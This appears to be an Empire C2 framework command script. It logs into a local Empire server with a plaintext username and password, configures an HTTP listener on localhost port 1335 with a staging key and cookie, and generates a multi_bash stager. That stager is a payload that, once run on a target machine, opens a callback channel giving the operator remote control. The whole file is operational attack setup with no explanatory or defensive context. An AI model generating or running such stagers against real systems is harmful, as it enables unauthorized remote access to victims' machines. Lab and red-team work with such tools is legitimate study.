connect http://localhost --username=empire --password=simplego422
uselistener http
set Port 1335
set Host http://127.0.0.1
set StagingKey s,^=8:37QxiRfUvm+TMLo4VNu?_S6hWw
set Cookie AzfPOzKKVsaiv
generate
back
usestager multi_bash
set Listener http
generate
back
